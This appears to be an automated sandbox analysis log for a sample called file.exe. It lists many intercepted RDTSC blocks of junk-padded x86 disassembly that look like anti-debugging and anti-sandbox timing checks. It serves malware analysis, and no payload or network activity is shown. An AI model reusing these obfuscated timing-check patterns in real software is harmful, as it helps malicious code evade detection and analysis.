Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5120784 second address: 51207A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov edi, 79439FD4h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4FE9502C62h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51207A8 second address: 51207AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51207AC second address: 51207B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51207B2 second address: 51207F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F4FE915D6B0h 0x00000011 mov ebp, esp 0x00000013 jmp 00007F4FE915D6B0h 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51207F0 second address: 51207F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51207F4 second address: 5120811 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 510014F second address: 510015E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 510015E second address: 5100225 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4FE915D6B1h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F4FE915D6ACh 0x00000017 and si, DD98h 0x0000001c jmp 00007F4FE915D6ABh 0x00000021 popfd 0x00000022 call 00007F4FE915D6B8h 0x00000027 pushfd 0x00000028 jmp 00007F4FE915D6B2h 0x0000002d adc cx, 5F28h 0x00000032 jmp 00007F4FE915D6ABh 0x00000037 popfd 0x00000038 pop eax 0x00000039 popad 0x0000003a mov ebp, esp 0x0000003c pushad 0x0000003d movsx edx, cx 0x00000040 mov di, cx 0x00000043 popad 0x00000044 mov eax, dword ptr [ebp+08h] 0x00000047 pushad 0x00000048 pushfd 0x00000049 jmp 00007F4FE915D6B5h 0x0000004e jmp 00007F4FE915D6ABh 0x00000053 popfd 0x00000054 popad 0x00000055 and dword ptr [eax], 00000000h 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5100225 second address: 5100240 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0361 second address: 50E0370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0370 second address: 50E0376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0376 second address: 50E037A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0DB3 second address: 50F0DC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE9502C5Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0DC3 second address: 50F0DD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0DD3 second address: 50F0DEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0DEB second address: 50F0DF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0DF1 second address: 50F0DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5120021 second address: 5120030 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5120030 second address: 512005F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 28B577FAh 0x00000008 call 00007F4FE9502C5Bh 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4FE9502C65h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51201CC second address: 512020F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4FE915D6B7h 0x00000008 mov dh, ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d ret 0x0000000e nop 0x0000000f push eax 0x00000010 call 00007F4FED4ED89Bh 0x00000015 mov edi, edi 0x00000017 jmp 00007F4FE915D6ABh 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e mov ax, 81FBh 0x00000022 mov cx, 42D7h 0x00000026 popad 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b push eax 0x0000002c pop edx 0x0000002d mov cx, 4BE1h 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0037 second address: 50D005A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D005A second address: 50D005E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D005E second address: 50D0094 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4FE9502C64h 0x0000000b popad 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4FE9502C67h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0094 second address: 50D00BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, A1h 0x00000005 mov eax, 03FCCDF7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d and esp, FFFFFFF8h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4FE915D6B9h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D00BF second address: 50D0123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F4FE9502C5Eh 0x0000000f push eax 0x00000010 jmp 00007F4FE9502C5Bh 0x00000015 xchg eax, ecx 0x00000016 pushad 0x00000017 mov bl, cl 0x00000019 pushfd 0x0000001a jmp 00007F4FE9502C61h 0x0000001f or si, 4A16h 0x00000024 jmp 00007F4FE9502C61h 0x00000029 popfd 0x0000002a popad 0x0000002b xchg eax, ebx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f mov edi, eax 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0123 second address: 50D0181 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4FE915D6B6h 0x00000008 jmp 00007F4FE915D6B5h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dl, ah 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007F4FE915D6AAh 0x00000019 xchg eax, ebx 0x0000001a jmp 00007F4FE915D6B0h 0x0000001f mov ebx, dword ptr [ebp+10h] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov ebx, 6E635910h 0x0000002a mov dh, F6h 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0181 second address: 50D0190 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dl 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0190 second address: 50D0194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0194 second address: 50D019A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D019A second address: 50D01A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D01A0 second address: 50D0226 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F4FE9502C5Eh 0x00000015 xor ah, FFFFFFE8h 0x00000018 jmp 00007F4FE9502C5Bh 0x0000001d popfd 0x0000001e pushad 0x0000001f mov dx, ax 0x00000022 pushfd 0x00000023 jmp 00007F4FE9502C62h 0x00000028 add eax, 140E6148h 0x0000002e jmp 00007F4FE9502C5Bh 0x00000033 popfd 0x00000034 popad 0x00000035 popad 0x00000036 mov esi, dword ptr [ebp+08h] 0x00000039 pushad 0x0000003a mov edx, eax 0x0000003c call 00007F4FE9502C60h 0x00000041 push esi 0x00000042 pop edi 0x00000043 pop eax 0x00000044 popad 0x00000045 push esp 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0226 second address: 50D022A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D022A second address: 50D022E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D022E second address: 50D0234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0234 second address: 50D0262 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4FE9502C67h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0262 second address: 50D0268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0268 second address: 50D026C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D026C second address: 50D02D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d pushad 0x0000000e call 00007F4FE915D6B4h 0x00000013 push esi 0x00000014 pop ebx 0x00000015 pop esi 0x00000016 pushfd 0x00000017 jmp 00007F4FE915D6B7h 0x0000001c and cl, 0000000Eh 0x0000001f jmp 00007F4FE915D6B9h 0x00000024 popfd 0x00000025 popad 0x00000026 je 00007F505B43B9EEh 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov edx, esi 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D02D9 second address: 50D02EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE9502C5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D02EB second address: 50D0349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f jmp 00007F4FE915D6B7h 0x00000014 je 00007F505B43B9C0h 0x0000001a jmp 00007F4FE915D6B6h 0x0000001f mov edx, dword ptr [esi+44h] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F4FE915D6B7h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0349 second address: 50D0372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F4FE9502C66h 0x00000014 mov dx, si 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0372 second address: 50D0378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0378 second address: 50D03F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edx, 61000000h 0x0000000e pushad 0x0000000f mov cx, dx 0x00000012 push ebx 0x00000013 call 00007F4FE9502C5Ah 0x00000018 pop eax 0x00000019 pop edi 0x0000001a popad 0x0000001b jne 00007F505B7E0F46h 0x00000021 pushad 0x00000022 movzx eax, bx 0x00000025 movsx edx, ax 0x00000028 popad 0x00000029 test byte ptr [esi+48h], 00000001h 0x0000002d jmp 00007F4FE9502C60h 0x00000032 jne 00007F505B7E0F3Dh 0x00000038 jmp 00007F4FE9502C60h 0x0000003d test bl, 00000007h 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 mov dl, 3Fh 0x00000045 call 00007F4FE9502C66h 0x0000004a pop ecx 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0942 second address: 50C0947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0947 second address: 50C094D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C094D second address: 50C0951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0951 second address: 50C096E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F4FE9502C5Ah 0x0000000f and esp, FFFFFFF8h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C096E second address: 50C0972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0972 second address: 50C0978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0978 second address: 50C09A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b call 00007F4FE915D6AEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C09A2 second address: 50C09F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007F4FE9502C61h 0x0000000b adc esi, 2D1085D6h 0x00000011 jmp 00007F4FE9502C61h 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov cx, 2799h 0x00000020 jmp 00007F4FE9502C66h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C09F1 second address: 50C09F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C09F7 second address: 50C09FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C09FB second address: 50C0A09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0A09 second address: 50C0A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0A10 second address: 50C0A15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0A15 second address: 50C0A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F4FE9502C69h 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esp 0x0000000e jmp 00007F4FE9502C5Ch 0x00000013 mov dword ptr [esp], esi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 movsx edx, cx 0x0000001c pushfd 0x0000001d jmp 00007F4FE9502C66h 0x00000022 or eax, 1A5BC248h 0x00000028 jmp 00007F4FE9502C5Bh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0A76 second address: 50C0A8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 75921BEAh 0x00000008 movsx ebx, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov esi, dword ptr [ebp+08h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0A8D second address: 50C0A93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0A93 second address: 50C0AE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4FE915D6ACh 0x00000009 adc si, E7D8h 0x0000000e jmp 00007F4FE915D6ABh 0x00000013 popfd 0x00000014 call 00007F4FE915D6B8h 0x00000019 pop eax 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ebx, 00000000h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F4FE915D6ADh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0C9B second address: 50C0CB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0CB1 second address: 50C0CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0CB5 second address: 50C0CBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0CBB second address: 50C0CD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE915D6B9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0CD8 second address: 50C0CF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0CF6 second address: 50C0CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0CFA second address: 50C0D00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0D00 second address: 50C0D06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0D06 second address: 50C0D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0D0A second address: 50C0D75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F4FE915D6B6h 0x00000011 push dword ptr [ebp+14h] 0x00000014 jmp 00007F4FE915D6B0h 0x00000019 push dword ptr [ebp+10h] 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007F4FE915D6ACh 0x00000025 adc cx, 3F68h 0x0000002a jmp 00007F4FE915D6ABh 0x0000002f popfd 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0DEC second address: 50C0E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ah, 8Eh 0x00000006 popad 0x00000007 mov cl, dl 0x00000009 popad 0x0000000a pop ebx 0x0000000b jmp 00007F4FE9502C5Ch 0x00000010 mov esp, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4FE9502C67h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0E1E second address: 50C0E51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 pushfd 0x00000007 jmp 00007F4FE915D6B0h 0x0000000c and ecx, 36CC8678h 0x00000012 jmp 00007F4FE915D6ABh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0E51 second address: 50C0E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0E55 second address: 50C0E5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0E5B second address: 50C0E61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0E61 second address: 50C0E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D09E8 second address: 50D0A00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE9502C64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0A00 second address: 50D0A26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d pushad 0x0000000e push esi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 call 00007F4FE915D6AAh 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514095F second address: 5140965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5140965 second address: 5140969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
